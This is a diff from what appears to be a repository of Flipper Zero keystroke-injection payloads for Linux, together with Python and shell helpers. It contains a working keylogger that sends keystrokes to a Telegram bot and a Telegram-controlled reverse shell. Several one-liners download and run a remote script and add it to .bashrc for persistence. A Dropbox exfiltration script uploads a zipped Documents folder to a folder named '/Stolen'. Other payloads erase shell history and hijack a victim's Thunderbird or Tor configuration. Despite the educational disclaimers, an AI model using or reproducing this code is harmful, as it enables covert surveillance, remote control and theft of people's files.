- Keylogger: The Keylogger class is responsible for capturing the pressed keys using the keyboard library. Based on the detected key, a modified callback function specified in the function call is invoked. When the usage of a certain keyboard key is detected, it is subsequently added to the log variable using the `add_to_log()` method of the `self.log` object from the Log class.
- Sender: The Sender class represents a thread solely dedicated to periodically invoking the `send_log()` method of the `self.log` object from the Log class.
- Log: The Log class represents a shared memory entity. The shared memory is the variable `self.log`, which is periodically managed through the `add_to_log()` and `send_log()` methods. This class was designed with the aim of avoiding data loss, and thus a lock management system was applied to prevent undesirable or unexpected situations when multiple users write rapidly. To handle the locks, `RLock` and `Condition` were chosen in the respective methods of the class.
The `add_to_log(self, log)` method acquires the lock through the invocation of `with self.lock` and updates the internal variable with the new received character. As the only waiting condition on the lock management is when the variable `self.lock` is empty, immediately after updating the internal variable, the unlocking function `self.condition.notify_all()` is invoked, allowing all threads (in this case, actually only 1, the Sender) to wake up and proceed with the sending operation.
The `send_log(self)` method acquires the lock and enters a waiting condition using `self.condition.wait()` if the variable `self.log` is empty. Once the lock is reacquired following a wake-up, the Sender Thread proceeds with sending the message using the `bot.send_message(...)` command, resetting the `self.log` variable to an empty initial state.
It is worth noting that although this Telegram bot could be used dynamically by anyone, it might be a good practice to use the ID statically (line 16 of the Python file) since the message recipients will always be you and not someone else (at least it shouldn't be so). This aspect may be considered less secure as it exposes sensitive and delicate information concerning your privacy and identity. However, since this script is not intended for malicious purposes or real-world use, but rather for educational purposes, it has been thoughtfully created and designed for study purposes.
Because Telegram uses a limited size per message, the script divides the output of the command into a theoretically infinite chunk of 1000 characters in length that will be sent one by one through the Telegram Bot.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Execution/Persistent_Keylogger-Telegram_Based/connection.py
+79
View File
@@ -0,0 +1,79 @@
from telebot import TeleBot
from time import sleep
import keyboard
from threading import Thread,RLock,Condition
# Set here the Telegram bot token
BOT_TOKEN = ""
bot = TeleBot(BOT_TOKEN)
class Log:
def __init__(self):
self.log = ""
self.lock = RLock()
self.condition = Condition(self.lock)
# Set here the Telegram user id
self.id = "0123456789"
def add_to_log(self, log):
with self.lock:
#print("Adding to log...")
self.log += log
self.condition.notify_all()
def send_log(self):
with self.lock:
#print("Sending to bot...")
while self.log == "":
#print("Waiting resources...")
self.condition.wait()
#print("Sending message!")
bot.send_message(self.id, self.log)
self.log = ""
class Keylogger(Thread):
def __init__(self, log):
super().__init__()
self.log = log
def callback(self, event):
name = event.name
if len(name) > 1:
if name == "space":
name = "[SPACE]"
elif name == "enter":
name = "[ENTER]\n"
elif name == "decimal":
name = "."
else:
name = name.replace(" ", "_")
name = f"[{name.upper()}]"
#print(f"Keylogger add to log: {name}")
self.log.add_to_log(name)
def run(self):
keyboard.on_release(callback=self.callback)
class Sender(Thread):
def __init__(self, log):
super().__init__()
self.log = log
def run(self):
while True:
sleep(5)
#print("Sender send log")
self.log.send_log()
log = Log()
keylogger = Keylogger(log)
keylogger.start()
sender = Sender(log)
sender.start()
bot.infinity_polling()
GNU-Linux/Execution/Persistent_Keylogger-Telegram_Based/payload.txt
+25
View File
@@ -0,0 +1,25 @@
REM ########################################################
REM # #
REM # Title : Persistent Keylogger - Telegram Based #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Execution #
REM # Target : Linux #
REM # #
REM ########################################################
REM Requirements:
REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
DELAY 1000
CTRL-ALT t
DELAY 2000
STRINGLN_BLOCK
curl -o connection.py #PYTHON-SCRIPT-LINK; python3 connection.py; echo "if ! pgrep -f connection.py >/dev/null; then
python3 connection.py &
fi" >> .bashrc; exit
END_STRINGLN
GNU-Linux/Execution/SendEmailThroughThunderbird/README.md
+77
View File
@@ -0,0 +1,77 @@
# Send Email Through Thunderbird
This payload can be used to prank friends by sending emails at top speed from their thunderbird clients.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
This payload can be used to prank friends by sending emails at top speed from their thunderbird clients.
This payload opens a shell (or powershell if running on windows), starts the Thunderbird application, and via the CTRL N sequence starts the email sending functionality that is not protected by any security system. After that it writes the recipient's email, the subject of the email and the body of the message and sends.
## Getting Started
### Windows 11
```DuckyScript
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRINGLN Start-Process "thunderbird.exe"
DELAY 4000
```
### Ubuntu 23.04
```DuckyScript
DELAY 1000
CTRL-ALT t
DELAY 2000
STRINGLN thunderbird
DELAY 4000
```
### Dependencies
* Internet Connection
* Thunderbird installed and email configured
### Settings
- Receiver email address
- Email Subject
- Email Message
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Execution/SendEmailThroughThunderbird/payload.txt
+63
View File
@@ -0,0 +1,63 @@
REM ########################################################
REM # |
REM # Title : Send Email Through Thunderbird |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 - Linux(debian tested) |
REM # |
REM ########################################################
REM Requirements:
REM - Internet Connection
REM - Thunderbird installed and email configured
REM This payload is tested on:
REM - Ubuntu 23.04
REM - Windows 11
REM REQUIRED - Set receiver email address
DEFINE EMAIL-ADDRESS example@hak5.org
REM REQUIRED - Set email Subject
DEFINE SUBJECT example
REM REQUIRED - Set email message
DEFINE MESSAGE example
REM # PowerShell
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRINGLN Start-Process "thunderbird.exe"
DELAY 4000
REM # Thunderbird
CTRL n
DELAY 2000
STRING EMAIL-ADDRESS
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
STRING SUBJECT
DELAY 500
TAB
DELAY 500
STRING MESSAGE
DELAY 500
CTRL ENTER
DELAY 2000
ENTER
REM # End actions
DELAY 2000
ALT F4
DELAY 1000
ALT F4
GNU-Linux/Execution/SetArbitraryVPN_Linux/README.md
+52
View File
@@ -0,0 +1,52 @@
# Set Arbitrary VPN - Linux ✅
A script used to set an arbitrary VPN on a Linux machine.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to set an arbitrary VPN on a Linux machine.
Opens a shell, download the vpn file, set the vpn through openvpn, erase traces.
## Getting Started
### Dependencies
* Permissions
* Internet Connection
### Settings
* Set the VPN file link
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Execution/SetArbitraryVPN_Linux/payload.txt
+70
View File
@@ -0,0 +1,70 @@
REM ####################################
REM # |
REM # Title : Set Arbitrary VPN |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ####################################
REM Requirements:
REM - Permissions
REM - Internet Connection
REM REQUIRED: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
REM REQUIRED: Set your VPN file configuration replacing example.com with your own link
DEFINE VPN_FILE_LINK example.com
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
STRING sudo su
ENTER
DELAY 1000
STRING SUDO_PASS
ENTER
DELAY 1000
REM #### VPN SECTION ####
STRING curl
STRING VPN_FILE_LINK
STRING > vpn_configuration.ovpn
ENTER
REM It depends by the internet connection
DELAY 2000
STRING openvpn vpn_configuration.ovpn
REM It depends by the computer power
DELAY 2000
REM #### REMOVE TRACES ####
STRING rm vpn_configuration.ovpn
ENTER
DELAY 500
STRING history -c
ENTER
DELAY 500
REM Exit from Sudo user
STRING exit
ENTER
DELAY 500
REM Close the shell
STRING exit
ENTER
GNU-Linux/Execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/README.md
+174
View File
@@ -0,0 +1,174 @@
# Set An Arbitrary And Persistent Tor Circuit
> _This description comes from the publication of the script on Hak5 and therefore reports specific features of advanced Hak5 devices._
>
> _However, the payload has been adapted appropriately so that it works on FlipperZero._
The "Set An Arbitrary And Persistent Tor Circuit" script is a payload designed to empower users to customize their Tor circuit according to their preferences using Duckyscript language. This payload provides the flexibility to set arbitrary Tor nodes and manually create a persistent circuit.
This script is highly versatile, as it is compatible with both Linux and Windows operating systems, thanks to the integration of the PASSIVE_WINDOWS_DETECT\[[1](#sources)] extension, enabling automatic system detection. Although testing on MacOS was not possible, it is likely that the payload can also be used on this operating system. This extension includes its own passive detect ready optimizing execution times making the entire process more efficient.
It is essential to emphasize that the use of this script must comply with local laws and respect the privacy of others. The primary goal of "Set An Arbitrary And Persistent Tor Circuit" is to provide users with more direct control over their Tor connection, allowing them to customize and further enhance their online browsing experience.
**Category**: Execution
![1](assets/1.gif)
*Dynamic visualization of the script in action. In this case I modified only the MiddleNode so that the persistence of the modification is shown but the full use of the payload results in immodifiability and persistence of all 3 nodes.*
_**Note**: The nodes are unmodifiable unless the initial Tor settings are restored or unless the torrc file is subsequently modified by removing the configurations made._
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Index
- [Set An Arbitrary And Persistent Tor Circuit](#set-an-arbitrary-and-static-tor-circuit)
- [Payload Description](#payload-description)
- [Note](#note)
- [Tor Configuration](#tor-configuration)
- - [Description of the Tor Circuit](#description-of-the-tor-circuit)
- - [Torrc Configuration File](#torrc-configuration-file)
- [Tor University Challenge by EFF](#tor-university-challenge-by-eff) *Off-topic*
- [Sources](#sources)
- [Credits](#credits)
## Payload Description
**Requirements:**
- Tor installed
- Fingerprints of your relays
**Notes:**
- Payload tested using TorBrowser 13.0.8 based on Mozilla Firefox 115.6.0esr ENG
- Payload tested on Windows 11_eng; Debian 12_eng; Ubuntu 23.10_eng;
To find fingerprints of various nodes you can go to https://metrics.torproject.org and set up a search based on what you are interested in such as country, node name, etc... For example if you try to search for '**Aleff**' it will send you to my [Tor Relay page](https://metrics.torproject.org/rs.html#details/B8C9DF8404FE175E37241774856907184A667ED2) (_Unless someone has created other Relays with the same name in the meantime_) where you can find the fingerprint information which is the data you are interested in.
![](https://i.ibb.co/YN5515G/tor-node.png)
The script begins by defining the fingerprints of the entry, middle, and exit nodes using the `DEFINE` commands. Additionally, it provides instructions for activating administrator permissions, with specific considerations for systems like Debian and Ubuntu.
**Configuration on Linux:**
- If the operating system is Linux, the user must provide the command to obtain root privileges (`#root_permission_command`) as `sudo su` instead of `su` and the associated password (`#sudo_pass`).
**Configuration on Windows:**
- If the operating system is Windows, the script opens TorBrowser using Windows GUI commands.
- Is not needed the root privileges
- It overwrites all the old data with the new data defined at the beginning of the script.
The script aims to edit the Tor configuration process to ensure the specific use of entry, middle, and exit nodes. Users need to customize the node fingerprints and provide specific operating system information to ensure the correct operation of the script on the target platform.
In any case, the script is designed to completely overwrite the old configuration of the torrc file, so be very careful how you use it since it could be an irreversible change and could cause a loss of data.
## Note
- The payload is designed to run on a Windows or Linux system and requires Tor to be installed.
- **#EntryNode**, **#MiddleNode**, **#ExitNode**: These variables must contain the fingerprint of the relays you want to use as nodes in your circuit.
- **#root_permission_command**: Activation of administrator permissions may vary from system to system. For example, for Debian it is necessary to use 'su' while for other systems such as Ubuntu it is necessary to use 'sudo su'. In general this can vary and is information that could be crucial in case the target has tampered with this functionality.
- **#sudo_pass**: Edit this field only if you plan to use this script on Linux operating systems as you need administrator permissions and therefore you need to know the password.
- **#const_var**: Do not change the variables that begin with 'const', they are constants that allow the nodes to be configured correctly.
- **EXTENSION**: Through the use of the PASSIVE_WINDOWS_DETECT\[[1](#sources)] extension, it is possible to detect the operating system on which the payload is launched, which, in this case, can be differentiated between Windows or any other operating system, which in our case corresponds to Linux. This powerful extension also allows you to determine when the system is ready to use since it includes the extension the passive Detect Ready. Using this extension not only makes it possible to use this payload dynamically on multiple systems, but also makes it extremely more efficient.
## Tor Configuration
![Tor](https://upload.wikimedia.org/wikipedia/commons/thumb/1/15/Tor-logo-2011-flat.svg/459px-Tor-logo-2011-flat.svg.png)
### Description of the Tor Circuit
The Tor circuit is a fundamental component of the infrastructure that ensures anonymity and security in online communications. The Tor circuit consists of three types of nodes, each with a specific role: Entry Node, Middle Node, and Exit Node.
![Tor Circuit](https://upload.wikimedia.org/wikipedia/commons/d/dc/Tor-onion-network.png)
1. **Entry Node:**
- The Entry Node is the first node in the Tor circuit.
- When a user initiates a connection through Tor, the traffic is encrypted and sent to the Entry Node.
- The Entry Node is aware of the user's IP address but cannot see the final destination of the traffic.
- Its primary function is to pass it to the next node, so the Middle Node, without knowing the ultimate destination.
2. **Middle Node:**
- The Middle Node is the second node in the Tor circuit.
- It receives encrypted traffic from the Entry Node and forwards it to the next node in the chain, which can be another Middle Node or the Exit Node.
- The Middle Node is not aware of the user's IP address or the final destination of the traffic.
- Its main function is to further enhance anonymity since it lacks information about the origin or destination of the traffic.
3. **Exit Node:**
- The Exit Node is the last node in the Tor circuit.
- It receives encrypted traffic from the Middle Node and decrypts it before sending it to the final destination on the internet.
- The Exit Node is aware of the destination address but does not know the user's IP address or the entry nodes in the circuit.
- Its primary function is to provide a point of exit for the traffic while maintaining the anonymity of the user.
### Torrc Configuration File
The `torrc` configuration file is a crucial component of the Tor, governing the behavior and settings of the Tor network on a particular system. This plaintext configuration file is typically named "torrc" and is utilized to customize various aspects of Tor's operation. Here's an overview of the key elements found in the `torrc` file:
1. **Entry, Middle, and Exit Nodes Configuration:**
- Users can specify the fingerprints or identities of preferred Entry, Middle, and Exit nodes using directives like `EntryNodes`, `MiddleNodes`, and `ExitNodes`. This allows users to influence the selection of these nodes in their Tor circuit for enhanced control or security. *This functionality is used in this payload.*
2. **General Tor Configuration:**
- The `torrc` file includes parameters for configuring the general behavior of Tor. This may involve settings such as the port on which Tor listens, bandwidth limits, logging preferences, and whether the system should act as a relay or only as a client.
3. **Bridge Configuration:**
- For users in regions with restricted access to the Tor network, the `torrc` file allows the configuration of bridge relays. Bridge relays help users bypass censorship by providing an alternative entry point to the Tor network.
4. **Hidden Service Configuration:**
- Users hosting Tor hidden services can configure their services through the `torrc` file. This includes defining the service's port, authentication methods, and other related parameters.
5. **Logging and Debugging:**
- The file provides options for configuring logging levels and debugging information. Users can tailor the amount of detail Tor logs, facilitating troubleshooting and analysis.
6. **Security Settings:**
- Various security-related options can be configured in the `torrc` file, such as restricting certain features or specifying the behavior of Tor in response to specific security events.
7. **Network and Protocol Settings:**
- Users can fine-tune Tor's network and protocol settings in the `torrc` file, influencing aspects such as circuit creation, DNS resolution, and transport protocols.
Customizing the `torrc` file allows users to tailor Tor's behavior to their specific needs and security requirements. However, users should exercise caution and adhere to Tor's best practices to ensure the continued effectiveness and anonymity of their Tor usage.
> See the [sources](#sources) section for more on this topic.
## Tor University Challenge by EFF
*Off-Topic*
![](https://www.eff.org/files/banner_library/banner-tor-monions.png)
Tor is a valuable tool for browsing the web anonymously, but since it's powered by volunteers willing to share some bandwidth and a computer, it's always in need of additional help. Which is why EFF is announcing the Tor University Challenge, a project asking universities to start running Tor relays on campus. Today, we're launching with support from 12 universities. With your help, we can add more universities to strengthen the Tor network to improve one of the best free privacy tools available today.
*Source: https://www.eff.org/deeplinks/2023/08/announcing-tor-university-challenge*
> If you are interested in finding out more about Tor and EFF's initiative, you can learn more at the official page of [Tor University Challenge](https://toruniversity.eff.org/).
## Sources
1. Passive Windows Detect - https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
2. Select the relays - https://metrics.torproject.org/rs.html
3. torrc - https://support.torproject.org/glossary/torrc/
4. Official torrc documentation and so on - https://2019.www.torproject.org/docs/tor-manual.html.en
5. Tor University Challenge - https://toruniversity.eff.org/
## Credits
<h2 align="center"> Aleff</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/assets/1.gif
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 519 KiB

GNU-Linux/Execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt
+53
View File
@@ -0,0 +1,53 @@
REM ################################################################
REM # |
REM # Title : Set An Arbitrary And Persistent Tor Circuit |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ################################################################
REM Requirements:
REM - Tor installed
REM - Fingerprints of your relays
REM Note:
REM - Payload tested using TorBrowser 13.0.8 based on Mozilla Firefoz 115.6.0esr ENG
REM - Payload tested on Debian 12_eng; Ubuntu 23.10_eng;
REM Set the Fingerprints here
DEFINE #EntryNode example
DEFINE #MiddleNode example
DEFINE #ExitNode example
REM Activation of administrator permissions may vary from system to system.
REM For example, for Debian it is necessary to use 'su' while for other systems such as Ubuntu it is necessary to use 'sudo su'.
REM In general this can vary and is information that could be crucial in case the target has tampered with this functionality.
DEFINE #root_permission_command sudo su
REM Edit this field only if you plan to use this script on Linux operating systems as you need administrator permissions and therefore you need to know the password.
DEFINE #sudo_pass example
REM Do not change the variables that begin with 'const', they are constants that allow the nodes to be configured correctly.
DEFINE #const_entry_node EntryNodes
DEFINE #const_middle_node MiddleNodes
DEFINE #const_exit_node ExitNodes
DELAY 2000
REM Opens a new terminal and login with administrator permissions.
CTRL-ALT t
STRINGLN #root_permission_command
DELAY 500
STRING #sudo_pass
DELAY 1000
REM Writes the new configuration into the torrc file deleting all the previous settings.
STRINGLN
echo "#const_entry_node #EntryNode
#const_middle_node #MiddleNode
#const_exit_node #ExitNode" > /etc/tor/torrc
END_STRINGLN
REM Then exit from the super user and close the terminal
DELAY 500
STRINGLN exit
ALT F4
GNU-Linux/Execution/Telegram_Persistent_Connection_Linux/README.md
+62
View File
@@ -0,0 +1,62 @@
# Telegram Persistent Connection Linux
A script used to configure a persistent connection on a Linux computer trough a pre-configured Telegram Bot.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to configure a persistent connesction on a Linux computer trough a pre-configured Telegram Bot.
Opens a shell, download the python script trough the `curl` command outputing the file into a `connection.py` file using `-o` option, then run it and set the run of the program as a default command every times a shell is runned.
This payload is intended as a basic reference point for developing payloads on a persistent connection Telegram based.
## Getting Started
### Dependencies
* Internet Connection
### Settings
- **Telegram Bot**: You should configure a bot trough Telegram. If you don't know how to do this, follow the guide about [Telegram Bot guide](#telegram-bot-guide). When you have create your personal Telegram Bot you should get the Telegram bot ID that you must put into the variable BOT_TOKEN at line 4 in the Python file as you can read in the line 3 comment.
- **Python Script**: Download, edit as you want and upload the python script somewhere you want and put the file link into the file payload.txt replacing the example link.
- **Persistence**: I preferred to create a mechanism that would allow you to create *some* persistence, not quite total, but you can have a high level of persistence. In this specific case, no permissions are needed, because it is sufficient to insert some lines in the .bashrc file that allow to keep the connection to Telegram open from the first time the user opens the terminal. Most of other mechanism needs the sudo permissions.
### Telegram Bot Guide
1. Search for `@botfather` in Telegram.
2. Start a conversation with BotFather by clicking on the Start button.
3. Type /newbot, and follow the prompts to set up a new bot.
4. Select and copy the Bot Token that you can see after the registration and past it into the `BOT_TOKEN` python variable that you find in the `connection.py` file at line 3.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Execution/Telegram_Persistent_Connection_Linux/connection.py
+11
View File
@@ -0,0 +1,11 @@
from telebot import TeleBot
# Set here the Telegram bot token
BOT_TOKEN = ""
bot = TeleBot(BOT_TOKEN)
@bot.message_handler(commands=['start'])
def send_welcome(message):
bot.reply_to(message, "Ok it works")
bot.infinity_polling()
GNU-Linux/Execution/Telegram_Persistent_Connection_Linux/payload.txt
+25
View File
@@ -0,0 +1,25 @@
REM #######################################################
REM # |
REM # Title : Telegram Persistent Connection Linux |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM #######################################################
REM Requirements:
REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
DELAY 1000
CTRL-ALT t
DELAY 2000
STRINGLN
curl -o connection.py #PYTHON-SCRIPT-LINK; python3 connection.py; echo "if ! pgrep -f connection.py >/dev/null; then
python3 connection.py &
fi" >> .bashrc; exit
END_STRINGLN
GNU-Linux/Execution/Telegram_Persistent_Reverse_Shell_Linux/README.md
+49
View File
@@ -0,0 +1,49 @@
# Persistent Reverse Shell - Telegram Based
A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Dependencies
* Internet Connection
## Description
A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot.
This payload is based on [Telegram Persistent Connection](Telegram_Persistent_Connection) payload for create the Telegram connection.
The script accept the `/reverse` command using the format `/reverse <shell_command>` and split `/reverse` from `<shell_command>` trough the `extract_command()` function, then execute the command acquired acquiring the output trough the function `run_command()`.
Because Telegram uses a limited size per message, the script divides the output of the command into a theoretically infinite chunk of 1000 characters in length that will be sent one by one through the Telegram Bot.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Execution/Telegram_Persistent_Reverse_Shell_Linux/connection.py
+43
View File
@@ -0,0 +1,43 @@
from telebot import TeleBot, types
import subprocess
# Set here the Telegram bot token
BOT_TOKEN = ""
bot = TeleBot(BOT_TOKEN)
commands = [
types.BotCommand("/reverse", "/reverse <shell_command>")
]
bot.set_my_commands(commands=commands)
@bot.message_handler(commands=['reverse'])
def reverse_shell(message):
command = extract_command(message.text)
if command != "":
print(f"Command received: {command}")
out = run_command(command)
if len(out) > 1000:
bot.reply_to(message, "Message too long...")
chunk_size = 1000
for i in range(0, len(out), chunk_size):
bot.send_message(message.chat.id, out[i:i+chunk_size])
else:
bot.reply_to(message, out)
def extract_command(message):
command_prefix = "/reverse"
if message.startswith(command_prefix):
return message[len(command_prefix):].strip()
else:
return None
def run_command(command):
try:
result = subprocess.check_output(command, shell=True, text=True)
return result.strip()
except subprocess.CalledProcessError as e:
return f"Some error: {e}"
bot.infinity_polling()
GNU-Linux/Execution/Telegram_Persistent_Reverse_Shell_Linux/payload.txt
+25
View File
@@ -0,0 +1,25 @@
REM ############################################################
REM # #
REM # Title : Persistent Reverse Shell - Telegram Based #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Execution #
REM # Target : Linux #
REM # #
REM ############################################################
REM Requirements:
REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
DELAY 1000
CTRL-ALT t
DELAY 2000
STRINGLN_BLOCK
curl -o connection.py #PYTHON-SCRIPT-LINK; python3 connection.py; echo "if ! pgrep -f connection.py >/dev/null; then
python3 connection.py &
fi" >> .bashrc; exit
END_STRINGLN
GNU-Linux/Exfiltration/ExfiltrateDocumentsFolder_Linux/README.md
+56
View File
@@ -0,0 +1,56 @@
# Exfiltrate Linux Content With Dropbox
A script used to close all target open applications.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Exfiltration
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to exfiltrate folder content on Linux Systems.
Opens a shel, zip all zippable (R permission) content of the folder, send the zip into the dropbox folder, delete shell history.
## Getting Started
### Dependencies
* Internet Connection
* Linux System
* * Terminal that can be opened by the shortcommand CTRL-ALT t
* DropBox Account for the access token
### Settings
* Set your dropbox access token
* Set the folder path interessed (i.e. /Documents)
* Change (if you think that it is necessary) the delay of the zipping operation
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Exfiltration/ExfiltrateDocumentsFolder_Linux/Send_Zip_To_Dropbox.sh
Executable
+21
View File
@@ -0,0 +1,21 @@
#!/bin/sh
# Set the access token for Dropbox API
ACCESS_TOKEN=""
# User name
NAME=$(whoami)
# Set the file path and name
FILE_PATH="/home/$NAME/Documents/files.zip"
FILE_NAME="files.zip"
# Set the Dropbox folder path
DROPBOX_FOLDER="/Stolen"
# Upload the file to Dropbox
curl -X POST https://content.dropboxapi.com/2/files/upload \
--header "Authorization: Bearer $ACCESS_TOKEN" \
--header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER/$FILE_NAME\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" \
--header "Content-Type: application/octet-stream" \
--data-binary "@$FILE_PATH"
